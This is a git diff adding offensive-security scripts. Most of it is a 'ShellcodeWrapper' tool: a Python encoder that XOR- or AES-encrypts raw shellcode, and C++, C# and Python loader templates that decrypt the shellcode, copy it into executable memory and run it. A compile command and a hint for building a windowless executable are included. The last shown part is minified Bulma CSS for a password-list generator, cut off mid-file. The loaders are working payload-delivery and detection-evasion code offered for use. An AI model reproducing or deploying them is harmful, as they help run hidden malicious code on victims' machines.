a/scripts/ShellcodeWrapper/requirements.txt b/scripts/ShellcodeWrapper/requirements.txt new file mode 100644 index 0000000..299326b --- /dev/null +++ b/scripts/ShellcodeWrapper/requirements.txt @@ -0,0 +1,2 @@ +pycrypto +pyscrypt \ No newline at end of file diff --git a/scripts/ShellcodeWrapper/shellcode_encoder_py3.py b/scripts/ShellcodeWrapper/shellcode_encoder_py3.py new file mode 100644 index 0000000..731b45c --- /dev/null +++ b/scripts/ShellcodeWrapper/shellcode_encoder_py3.py @@ -0,0 +1,255 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- +# +# Author: Arno0x0x, Twitter: @Arno0x0x +# 本项目将python2代码修改为python3 + + +import argparse +from Crypto.Hash import MD5 +from Crypto.Cipher import AES +import pyscrypt +from base64 import b64encode +from os import urandom +from string import Template +import os + +templates = { + 'cpp': './templates/encryptedShellcodeWrapper.cpp', + 'csharp': './templates/encryptedShellcodeWrapper.cs', + 'python': './templates/encryptedShellcodeWrapper.py' +} + +resultFiles = { + 'cpp': './result/encryptedShellcodeWrapper.cpp', + 'csharp': './result/encryptedShellcodeWrapper.cs', + 'python': './result/encryptedShellcodeWrapper.py' +} + +#====================================================================================================== +# CRYPTO FUNCTIONS +#====================================================================================================== + +#------------------------------------------------------------------------ +# data as a bytearray +# key as a string +def xor(data, key): + l = len(key) + keyAsInt = list(map(ord, key)) + return bytes(bytearray(( + (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data)) + ))) + +#------------------------------------------------------------------------ +def pad(s): + """PKCS7 padding""" + return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size) + +#------------------------------------------------------------------------ +def aesEncrypt(clearText, key): + """Encrypts data with the provided key. + The returned byte array is as follow: + :==============:==================================================: + : IV (16bytes) : Encrypted (data + PKCS7 padding information) : + :==============:==================================================: + """ + + # Generate a crypto secure random Initialization Vector + iv = urandom(AES.block_size) + + # Perform PKCS7 padding so that clearText is a multiple of the block size + clearText = pad(clearText) + + cipher = AES.new(key, AES.MODE_CBC, iv) + return iv + cipher.encrypt(bytes(clearText)) + +#====================================================================================================== +# OUTPUT FORMAT FUNCTIONS +#====================================================================================================== +def convertFromTemplate(parameters, templateFile): + try: + with open(templateFile) as f: + src = Template(f.read()) + result = src.substitute(parameters) + f.close() + return result + except IOError: + print(color("[!] Could not open or read template file [{}]".format(templateFile))) + return None + +#------------------------------------------------------------------------ +# data as a bytearray +def formatCPP(data, key, cipherType): + shellcode = "\\x" + shellcode += "\\x".join(format(b,'02x') for b in data) + result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['cpp']) + + if result != None: + try: + fileName = os.path.splitext(resultFiles['cpp'])[0] + "_" + cipherType + os.path.splitext(resultFiles['cpp'])[1] + with open(fileName,"w+") as f: + f.write(result) + f.close() + print(color("[+] C++ code file saved in [{}]".format(fileName))) + except IOError: + print(color("[!] Could not write C++ code [{}]".format(fileName))) + +#------------------------------------------------------------------------ +# data as a bytearray +def formatCSharp(data, key, cipherType): + shellcode = '0x' + shellcode += ',0x'.join(format(b,'02x') for b in data) + result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['csharp']) + + if result != None: + try: + fileName = os.path.splitext(resultFiles['csharp'])[0] + "_" + cipherType + os.path.splitext(resultFiles['csharp'])[1] + with open(fileName,"w+") as f: + f.write(result) + f.close() + print(color("[+] C# code file saved in [{}]".format(fileName))) + except IOError: + print(color("[!] Could not write C# code [{}]".format(fileName))) + +#------------------------------------------------------------------------ +# data as a bytearray +def formatPy(data, key, cipherType): + shellcode = '\\x' + shellcode += '\\x'.join(format(b,'02x') for b in data) + result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['python']) + + if result != None: + try: + fileName = os.path.splitext(resultFiles['python'])[0] + "_" + cipherType + os.path.splitext(resultFiles['python'])[1] + with open(fileName,"w+") as f: + f.write(result) + f.close() + print(color("[+] Python code file saved in [{}]".format(fileName))) + except IOError: + print(color("[!] Could not write Python code [{}]".format(fileName))) + +#------------------------------------------------------------------------ +# data as a bytearray +def formatB64(data): + return b64encode(data) + +#====================================================================================================== +# HELPERS FUNCTIONS +#====================================================================================================== + +#------------------------------------------------------------------------ +def color(string, color=None): + """ + Author: HarmJ0y, borrowed from Empire + Change text color for the Linux terminal. + """ + + attr = [] + # bold + attr.append('1') + + if color: + if color.lower() == "red": + attr.append('31') + elif color.lower() == "green": + attr.append('32') + elif color.lower() == "blue": + attr.append('34') + return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) + + else: + if string.strip().startswith("[!]"): + attr.append('31') + return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) + elif string.strip().startswith("[+]"): + attr.append('32') + return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) + elif string.strip().startswith("[?]"): + attr.append('33') + return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) + elif string.strip().startswith("[*]"): + attr.append('34') + return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) + else: + return string + +#====================================================================================================== +# MAIN FUNCTION +#====================================================================================================== +if __name__ == '__main__': + #------------------------------------------------------------------------ + # Parse arguments + parser = argparse.ArgumentParser() + parser.add_argument("shellcodeFile", help="File name containing the raw shellcode to be encoded/encrypted") + parser.add_argument("key", help="Key used to transform (XOR or AES encryption) the shellcode") + parser.add_argument("encryptionType", help="Encryption algorithm to apply to the shellcode", choices=['xor','aes']) + parser.add_argument("-b64", "--base64", help="Display transformed shellcode as base64 encoded string", action="store_true") + parser.add_argument("-cpp", "--cplusplus", help="Generates C++ file code", action="store_true") + parser.add_argument("-cs", "--csharp", help="Generates C# file code", action="store_true") + parser.add_argument("-py", "--python", help="Generates Python file code", action="store_true") + args = parser.parse_args() + + #------------------------------------------------------------------------------ + # Check that required directories and path are available, if not create them + if not os.path.isdir("./result"): + os.makedirs("./result") + print(color("[+] Creating [./result] directory for resulting code files")) + + #------------------------------------------------------------------------ + # Open shellcode file and read all bytes from it + try: + with open(args.shellcodeFile,'rb') as shellcodeFileHandle: + shellcodeBytes = bytearray(shellcodeFileHandle.read()) + shellcodeFileHandle.close() + print(color("[*] Shellcode file [{}] successfully loaded".format(args.shellcodeFile))) + except IOError: + print(color("[!] Could not open or read file [{}]".format(args.shellcodeFile))) + quit() + + print(color("[*] MD5 hash of the initial shellcode: [{}]".format(MD5.new(shellcodeBytes).hexdigest()))) + print(color("[*] Shellcode size: [{}] bytes".format(len(shellcodeBytes)))) + + #------------------------------------------------------------------------ + # Perform AES128 transformation + if args.encryptionType == 'aes': + # Derive a 16 bytes (128 bits) master key from the provided key + key = pyscrypt.hash(args.key, "saltmegood", 1024, 1, 1, 16) + masterKey = formatB64(key) + print(color("[*] AES encrypting the shellcode with 128 bits derived key [{}]".format(masterKey))) + transformedShellcode = aesEncrypt(shellcodeBytes, key) + cipherType = 'aes' + + #------------------------------------------------------------------------ + # Perform XOR transformation + elif args.encryptionType == 'xor': + masterKey = args.key + print(color("[*] XOR encoding the shellcode with key [{}]".format(masterKey))) + transformedShellcode = xor(shellcodeBytes, masterKey) + cipherType = 'xor' + + #------------------------------------------------------------------------ + # Display interim results + print("\n==================================== RESULT ====================================\n") + print(color("[*] Encrypted shellcode size: [{}] bytes".format(len(transformedShellcode)))) + #------------------------------------------------------------------------ + # Display formated output + if args.base64: + print(color("[*] Transformed shellcode as a base64 encoded string") ) + print(formatB64(transformedShellcode)) + print("") + + if args.cplusplus: + print(color("[*] Generating C++ code file")) + formatCPP(transformedShellcode, masterKey, cipherType) + print("") + + + if args.csharp: + print(color("[*] Generating C# code file")) + formatCSharp(transformedShellcode, masterKey, cipherType) + print("") + + if args.python: + print(color("[*] Generating Python code file")) + formatPy(transformedShellcode, masterKey, cipherType) + print("") diff --git a/scripts/ShellcodeWrapper/templates/encryptedShellcodeWrapper.cpp b/scripts/ShellcodeWrapper/templates/encryptedShellcodeWrapper.cpp new file mode 100644 index 0000000..3b723f6 --- /dev/null +++ b/scripts/ShellcodeWrapper/templates/encryptedShellcodeWrapper.cpp @@ -0,0 +1,37 @@ +/* +Author: Arno0x0x, Twitter: @Arno0x0x +*/ + +#include "stdafx.h" +#include +#include + +int main(int argc, char **argv) { + + // Encrypted shellcode and cipher key obtained from shellcode_encoder.py + char encryptedShellcode[] = "${shellcode}"; + char key[] = "${key}"; + char cipherType[] = "${cipherType}"; + + // Char array to host the deciphered shellcode + char shellcode[sizeof encryptedShellcode]; + + + // XOR decoding stub using the key defined above must be the same as the encoding key + int j = 0; + for (int i = 0; i < sizeof encryptedShellcode; i++) { + if (j == sizeof key - 1) j = 0; + + shellcode[i] = encryptedShellcode[i] ^ key[j]; + j++; + } + + // Allocating memory with EXECUTE writes + void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + + // Copying deciphered shellcode into memory as a function + memcpy(exec, shellcode, sizeof shellcode); + + // Call the shellcode + ((void(*)())exec)(); +} diff --git a/scripts/ShellcodeWrapper/templates/encryptedShellcodeWrapper.cs b/scripts/ShellcodeWrapper/templates/encryptedShellcodeWrapper.cs new file mode 100644 index 0000000..1be1624 --- /dev/null +++ b/scripts/ShellcodeWrapper/templates/encryptedShellcodeWrapper.cs @@ -0,0 +1,136 @@ +/* +Author: Arno0x0x, Twitter: @Arno0x0x + +How to compile: +=============== +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:encryptedShellcodeWrapper_${cipherType}.exe encryptedShellcodeWrapper_${cipherType}.cs + +*/ + +using System; +using System.IO; +using System.Collections.Generic; +using System.Text; +using System.Threading.Tasks; +using System.Security.Cryptography; +using System.Runtime.InteropServices; + +namespace RunShellCode +{ + static class Program + { + //============================================================================== + // CRYPTO FUNCTIONS + //============================================================================== + private static T[] SubArray(this T[] data, int index, int length) + { + T[] result = new T[length]; + Array.Copy(data, index, result, 0, length); + return result; + } + + private static byte[] xor(byte[] cipher, byte[] key) { + byte[] decrypted = new byte[cipher.Length]; + + for(int i = 0; i < cipher.Length; i++) { + decrypted[i] = (byte) (cipher[i] ^ key[i % key.Length]); + } + + return decrypted; + } + + //-------------------------------------------------------------------------------------------------- + // Decrypts the given a plaintext message byte array with a given 128 bits key + // Returns the unencrypted message + //-------------------------------------------------------------------------------------------------- + private static byte[] aesDecrypt(byte[] cipher, byte[] key) + { + var IV = cipher.SubArray(0, 16); + var encryptedMessage = cipher.SubArray(16, cipher.Length - 16); + + // Create an AesManaged object with the specified key and IV. + using (AesManaged aes = new AesManaged()) + { + aes.Padding = PaddingMode.PKCS7; + aes.KeySize = 128; + aes.Key = key; + aes.IV = IV; + + using (MemoryStream ms = new MemoryStream()) + { + using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(), CryptoStreamMode.Write)) + { + cs.Write(encryptedMessage, 0, encryptedMessage.Length); + } + + return ms.ToArray(); + } + } + } + + //============================================================================== + // MAIN FUNCTION + //============================================================================== + static void Main() + { + byte[] encryptedShellcode = new byte[] { ${shellcode} }; + string key = "${key}"; + string cipherType = "${cipherType}"; + + + byte[] shellcode = null; + + //-------------------------------------------------------------- + // Decrypt the shellcode + if (cipherType == "xor") { + shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key)); + } + else if (cipherType == "aes") { + shellcode = aesDecrypt(encryptedShellcode, Convert.FromBase64String(key)); + } + + //-------------------------------------------------------------- + // Copy decrypted shellcode to memory + UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); + IntPtr hThread = IntPtr.Zero; + UInt32 threadId = 0; + + // Prepare data + IntPtr pinfo = IntPtr.Zero; + + // Invoke the shellcode + hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); + WaitForSingleObject(hThread, 0xFFFFFFFF); + return; + } + + private static UInt32 MEM_COMMIT = 0x1000; + private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; + + // The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject + [DllImport("kernel32")] + private static extern UInt32 VirtualAlloc( + UInt32 lpStartAddr, + UInt32 size, + UInt32 flAllocationType, + UInt32 flProtect + ); + + [DllImport("kernel32")] + private static extern IntPtr CreateThread( + UInt32 lpThreadAttributes, + UInt32 dwStackSize, + UInt32 lpStartAddress, + IntPtr param, + UInt32 dwCreationFlags, + ref UInt32 lpThreadId + ); + + [DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject( + IntPtr hHandle, + UInt32 dwMilliseconds + ); + } +} diff --git a/scripts/ShellcodeWrapper/templates/encryptedShellcodeWrapper.py b/scripts/ShellcodeWrapper/templates/encryptedShellcodeWrapper.py new file mode 100644 index 0000000..3f61b6b --- /dev/null +++ b/scripts/ShellcodeWrapper/templates/encryptedShellcodeWrapper.py @@ -0,0 +1,60 @@ +#!/usr/bin/python +# -*- coding: utf8 -*- +# Author: Arno0x0x, Twitter: @Arno0x0x +# +# You can create a windows executable: pyinstaller --onefile --noconsole multibyteEncodedShellcode.py +from Crypto.Cipher import AES +from ctypes import * +import base64 + +#====================================================================================================== +# CRYPTO FUNCTIONS +#====================================================================================================== + +#------------------------------------------------------------------------ +# data as a bytearray +# key as a string +def xor(data, key): + l = len(key) + keyAsInt = map(ord, key) + return bytes(bytearray(( + (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data)) + ))) + +#------------------------------------------------------------------------ +def unpad(s): + """PKCS7 padding removal""" + return s[:-ord(s[len(s)-1:])] + +#------------------------------------------------------------------------ +def aesDecrypt(cipherText, key): + """Decrypt data with the provided key""" + + # Initialization Vector is in the first 16 bytes + iv = cipherText[:AES.block_size] + + cipher = AES.new(key, AES.MODE_CBC, iv) + return unpad(cipher.decrypt(cipherText[AES.block_size:])) + +#====================================================================================================== +# MAIN FUNCTION +#====================================================================================================== +if __name__ == '__main__': + + encryptedShellcode = ("${shellcode}") + key = "${key}" + cipherType = "${cipherType}" + + # Decrypt the shellcode + if cipherType == 'xor': + shellcode = xor(bytearray(encryptedShellcode), key) + elif cipherType == 'aes': + key = base64.b64decode(key) + shellcode = aesDecrypt(encryptedShellcode, key) + else: + print "[ERROR] Unknown cipher type" + + # Copy the shellcode to memory and invoke it + memory_with_shell = create_string_buffer(shellcode, len(shellcode)) + shell = cast(memory_with_shell,CFUNCTYPE(c_void_p)) + shell() diff --git a/scripts/Weakpass_Generator/css/bulma.min.css b/scripts/Weakpass_Generator/css/bulma.min.css new file mode 100644 index 0000000..be16f72 --- /dev/null +++ b/scripts/Weakpass_Generator/css/bulma.min.css @@ -0,0 +1 @@ +/*! bulma.io v0.9.3 | MIT License | github.com/jgthms/bulma */.button,.file-cta,.file-name,.input,.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous,.select select,.textarea{-moz-appearance:none;-webkit-appearance:none;align-items:center;border:1px solid transparent;border-radius:4px;box-shadow:none;display:inline-flex;font-size:1rem;height:2.5em;justify-content:flex-start;line-height:1.5;padding-bottom:calc(.5em - 1px);padding-left:calc(.75em - 1px);padding-right:calc(.75em - 1px);padding-top:calc(.5em - 1px);position:relative;vertical-align:top}.button:active,.button:focus,.file-cta:active,.file-cta:focus,.file-name:active,.file-name:focus,.input:active,.input:focus,.is-active.button,.is-active.file-cta,.is-active.file-name,.is-active.input,.is-active.pagination-ellipsis,.is-active.pagination-link,.is-active.pagination-next,.is-active.pagination-previous,.is-active.textarea,.is-focused.button,.is-focused.file-cta,.is-focused.file-name,.is-focused.input,.is-focused.pagination-ellipsis,.is-focused.pagination-link,.is-focused.pagination-next,.is-focused.pagination-previous,.is-focused.textarea,.pagination-ellipsis:active,.pagination-ellipsis:focus,.pagination-link:active,.pagination-link:focus,.pagination-next:active,.pagination-next:focus,.pagination-previous:active,.pagination-previous:focus,.select select.is-active,.select select.is-focused,.select select:active,.select select:focus,.textarea:active,.textarea:focus{outline:0}.button[disabled],.file-cta[disabled],.file-name[disabled],.input[disabled],.pagination-ellipsis[disabled],.pagination-link[disabled],.pagination-next[disabled],.pagination-previous[disabled],.select fieldset[disabled] select,.select select[disabled],.textarea[disabled],fieldset[disabled] .button,fieldset[disabled] .file-cta,fieldset[disabled] .file-name,fieldset[disabled] .input,fieldset[disabled] .pagination-ellipsis,fieldset[disabled] .pagination-link,fieldset[disabled] .pagination-next,fieldset[disabled] .pagination-previous,fieldset[disabled] .select select,fieldset[disabled] .textarea{cursor:not-allowed}.breadcrumb,.button,.file,.is-unselectable,.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous,.tabs{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.navbar-link:not(.is-arrowless)::after,.select:not(.is-multiple):not(.is-loading)::after{border:3px solid transparent;border-radius:2px;border-right:0;border-top:0;content:" ";display:block;height:.625em;margin-top:-.4375em;pointer-events:none;position:absolute;top:50%;transform:rotate(-45deg);transform-origin:center;width:.625em}.block:not(:last-child),.box:not(:last-child),.breadcrumb:not(:last-child),.content:not(:last-child),.level:not(:last-child),.message:not(:last-child),.notification:not(:last-child),.pagination:not(:last-child),.progress:not(:last-child),.subtitle:not(:last-child),.table-container:not(:last-child),.table:not(:last-child),.tabs:not(:last-child),.title:not(:last-child){margin-bottom:1.5rem}.delete,.modal-close{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-moz-appearance:none;-webkit-appearance:none;background-color:rgba(10,10,10,.2);border:none;border-radius:9999px;cursor:pointer;pointer-events:auto;display:inline-block;flex-grow:0;flex-shrink:0;font-size:0;height:20px;max-height:20px;max-width:20px;min-height:20px;min-width:20px;outline:0;position:relative;vertical-align:top;width:20px}.delete::after,.delete::before,.modal-close::after,.modal-close::before{background-color:#fff;content:"";display:block;left:50%;position:absolute;top:50%;transform:translateX(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.delete::before,.modal-close::before{height:2px;width:50%}.delete::after,.modal-close::after{height:50%;width:2px}.delete:focus,.delete:hover,.modal-close:focus,.modal-close:hover{background-color:rgba(10,10,10,.3)}.delete:active,.modal-close:active{background-color:rgba(10,10,10,.4)}.is-small.delete,.is-small.modal-close{height:16px;max-height:16px;max-width:16px;min-height:16px;min-width:16px;width:16px}.is-medium.delete,.is-medium.modal-close{height:24px;max-height:24px;max-width:24px;min-height:24px;min-width:24px;width:24px}.is-large.delete,.is-large.modal-close{height:32px;max-height:32px;max-width:32px;min-height:32px;min-width:32px;width:32px}.button.is-loading::after,.control.is-loading::after,.loader,.select.is-loading::after{-webkit-animation:spinAround .5s infinite linear;animation:spinAround .5s infinite linear;border:2px solid #dbdbdb;border-radius:9999px;border-right-color:transparent;border-top-color:transparent;content:"";display:block;height:1em;position:relative;width:1em}.hero-video,.image.is-16by9 .has-ratio,.image.is-16by9 img,.image.is-1by1 .has-ratio,.image.is-1by1 img,.image.is-1by2 .has-ratio,.image.is-1by2 img,.image.is-1by3 .has-ratio,.image.is-1by3 img,.image.is-2by1 .has-ratio,.image.is-2by1 img,.image.is-2by3 .has-ratio,.image.is-2by3 img,.image.is-3by1 .has-ratio,.image.is-3by1 img,.image.is-3by2 .has-ratio,.image.is-3by2 img,.image.is-3by4 .has-ratio,.image.is-3by4 img,.image.is-3by5 .has-ratio,.image.is-3by5 img,.image.is-4by3 .has-ratio,.image.is-4by3 img,.image.is-4by5 .has-ratio,.image.is-4by5 img,.image.is-5by3 .has-ratio,.image.is-5by3 img,.image.is-5by4 .has-ratio,.image.is-5by4 img,.image.is-9by16 .has-ratio,.image.is-9by16 img,.image.is-square .has-ratio,.image.is-square img,.is-overlay,.modal,.modal-background{bottom:0;left:0;position:absolute;right:0;top:0}.navbar-burger{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:0 0;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0}/*! minireset.css v0.0.6 | MIT License | github.com/jgthms/minireset.css */blockquote,body,dd,dl,dt,fieldset,figure,h1,h2,h3,h4,h5,h6,hr,html,iframe,legend,li,ol,p,pre,textarea,ul{margin:0;padding:0}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:400}ul{list-style:none}button,input,select,textarea{margin:0}html{box-sizing:border-box}*,::after,::before{box-sizing:inherit}img,video{height:auto;max-width:100%}iframe{border:0}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}td:not([align]),th:not([align]){text-align:inherit}html{background-color:#fff;font-size:16px;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;min-width:300px;overflow-x:hidden;overflow-y:scroll;text-rendering:optimizeLegibility;-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;text-size-adjust:100%}article,aside,figure,footer,header,hgroup,section{display:block}body,button,input,optgroup,select,textarea{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif}code,pre{-moz-osx-font-smoothing:auto;-webkit-font-smoothing:auto;font-family:monospace}body{color:#4a4a4a;font-size:1em;font-weight:400;line-height:1.5}a{color:#485fc7;cursor:pointer;text-decoration:none}a strong{color:currentColor}a:hover{color:#363636}code{background-color:#f5f5f5;color:#da1039;font-size:.875em;font-weight:400;padding:.25em .5em .25em}hr{background-color:#f5f5f5;border:none;display:block;height:2px;margin:1.5rem 0}img{height:auto;max-width:100%}input[type=checkbox],input[type=radio]{vertical-align:baseline}small{font-size:.875em}span{font-style:inherit;font-weight:inherit}strong{color:#363636;font-weight:700}fieldset{border:none}pre{-webkit-overflow-scrolling:touch;background-color:#f5f5f5;color:#4a4a4a;font-size:.875em;overflow-x:auto;padding:1.25rem 1.5rem;white-space:pre;word-wrap:normal}pre code{background-color:transparent;color:currentColor;font-size:1em;padding:0}table td,table th{vertical-align:top}table td:not([align]),table th:not([align]){text-align:inherit}table th{color:#363636}@-webkit-keyframes spinAround{from{transform:rotate(0)}to{transform:rotate(359deg)}}@keyframes spinAround{from{transform:rotate(0)}to{transform:rotate(359deg)}}.box{background-color:#fff;border-radius:6px;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);color:#4a4a4a;display:block;padding:1.25rem}a.box:focus,a.box:hover{box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px #485fc7}a.box:active{box-shadow:inset 0 1px 2px rgba(10,10,10,.2),0 0 0 1px #485fc7}.button{background-color:#fff;border-color:#dbdbdb;border-width:1px;color:#363636;cursor:pointer;justify-content:center;padding-bottom:calc(.5em - 1px);padding-left:1em;padding-right:1em;padding-top:calc(.5em - 1px);text-align:center;white-space:nowrap}.button strong{color:inherit}.button .icon,.button .icon.is-large,.button .icon.is-medium,.button .icon.is-small{height:1.5em;width:1.5em}.button .icon:first-child:not(:last-child){margin-left:calc(-.5em - 1px);margin-right:.25em}.button .icon:last-child:not(:first-child){margin-left:.25em;margin-right:calc(-.5em - 1px)}.button .icon:first-child:last-child{margin-left:calc(-.5em - 1px);margin-right:calc(-.5em - 1px)}.button.is-hovered,.button:hover{border-color:#b5b5b5;color:#363636}.button.is-focused,.button:focus{border-color:#485fc7;color:#363636}.button.is-focused:not(:active),.button:focus:not(:active){box-shadow:0 0 0 .125em rgba(72,95,199,.25)}.button.is-active,.button:active{border-color:#4a4a4a;color:#363636}.button.is-text{background-color:transparent;border-color:transparent;color:#4a4a4a;text-decoration:underline}.button.is-text.is-focused,.button.is-text.is-hovered,.button.is-text:focus,.button.is-text:hover{background-color:#f5f5f5;color:#363636}.button.is-text.is-active,.button.is-text:active{background-color:#e8e8e8;color:#363636}.button.is-text[disabled],fieldset[disabled] .button.is-text{background-color:transparent;border-color:transparent;box-shadow:none}.button.is-ghost{background:0 0;border-color:transparent;color:#485fc7;text-decoration:none}.button.is-ghost.is-hovered,.button.is-ghost:hover{color:#485fc7;text-decoration:underline}.button.is-white{background-color:#fff;border-color:transparent;color:#0a0a0a}.button.is-white.is-hovered,.button.is-white:hover{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.button.is-white.is-focused,.button.is-white:focus{border-color:transparent;color:#0a0a0a}.button.is-white.is-focused:not(:active),.button.is-white:focus:not(:active){box-shadow:0 0 0 .125em rgba(255,255,255,.25)}.button.is-white.is-active,.button.is-white:active{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.button.is-white[disabled],fieldset[disabled] .button.is-white{background-color:#fff;border-color:transparent;box-shadow:none}.button.is-white.is-inverted{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-hovered,.button.is-white.is-inverted:hover{background-color:#000}.button.is-white.is-inverted[disabled],fieldset[disabled] .button.is-white.is-inverted{background-color:#0a0a0a;border-color:transparent;box-shadow:none;color:#fff}.button.is-white.is-loading::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-white.is-outlined.is-focused,.button.is-white.is-outlined.is-hovered,.button.is-white.is-outlined:focus,.button.is-white.is-outlined:hover{background-color:#fff;border-color:#fff;color:#0a0a0a}.button.is-white.is-outlined.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-white.is-outlined.is-loading.is-focused::after,.button.is-white.is-outlined.is-loading.is-hovered::after,.button.is-white.is-outlined.is-loading:focus::after,.button.is-white.is-outlined.is-loading:hover::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined[disabled],fieldset[disabled] .button.is-white.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-white.is-inverted.is-outlined.is-focused,.button.is-white.is-inverted.is-outlined.is-hovered,.button.is-white.is-inverted.is-outlined:focus,.button.is-white.is-inverted.is-outlined:hover{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-white.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-white.is-inverted.is-outlined.is-loading:focus::after,.button.is-white.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-white.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black{background-color:#0a0a0a;border-color:transparent;color:#fff}.button.is-black.is-hovered,.button.is-black:hover{background-color:#040404;border-color:transparent;color:#fff}.button.is-black.is-focused,.button.is-black:focus{border-color:transparent;color:#fff}.button.is-black.is-focused:not(:active),.button.is-black:focus:not(:active){box-shadow:0 0 0 .125em rgba(10,10,10,.25)}.button.is-black.is-active,.button.is-black:active{background-color:#000;border-color:transparent;color:#fff}.button.is-black[disabled],fieldset[disabled] .button.is-black{background-color:#0a0a0a;border-color:transparent;box-shadow:none}.button.is-black.is-inverted{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-hovered,.button.is-black.is-inverted:hover{background-color:#f2f2f2}.button.is-black.is-inverted[disabled],fieldset[disabled] .button.is-black.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#0a0a0a}.button.is-black.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-black.is-outlined.is-focused,.button.is-black.is-outlined.is-hovered,.button.is-black.is-outlined:focus,.button.is-black.is-outlined:hover{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.button.is-black.is-outlined.is-loading::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-outlined.is-loading.is-focused::after,.button.is-black.is-outlined.is-loading.is-hovered::after,.button.is-black.is-outlined.is-loading:focus::after,.button.is-black.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-black.is-outlined[disabled],fieldset[disabled] .button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-black.is-inverted.is-outlined.is-focused,.button.is-black.is-inverted.is-outlined.is-hovered,.button.is-black.is-inverted.is-outlined:focus,.button.is-black.is-inverted.is-outlined:hover{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-black.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-black.is-inverted.is-outlined.is-loading:focus::after,.button.is-black.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-light{background-color:#f5f5f5;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light.is-hovered,.button.is-light:hover{background-color:#eee;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light.is-focused,.button.is-light:focus{border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light.is-focused:not(:active),.button.is-light:focus:not(:active){box-shadow:0 0 0 .125em rgba(245,245,245,.25)}.button.is-light.is-active,.button.is-light:active{background-color:#e8e8e8;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light[disabled],fieldset[disabled] 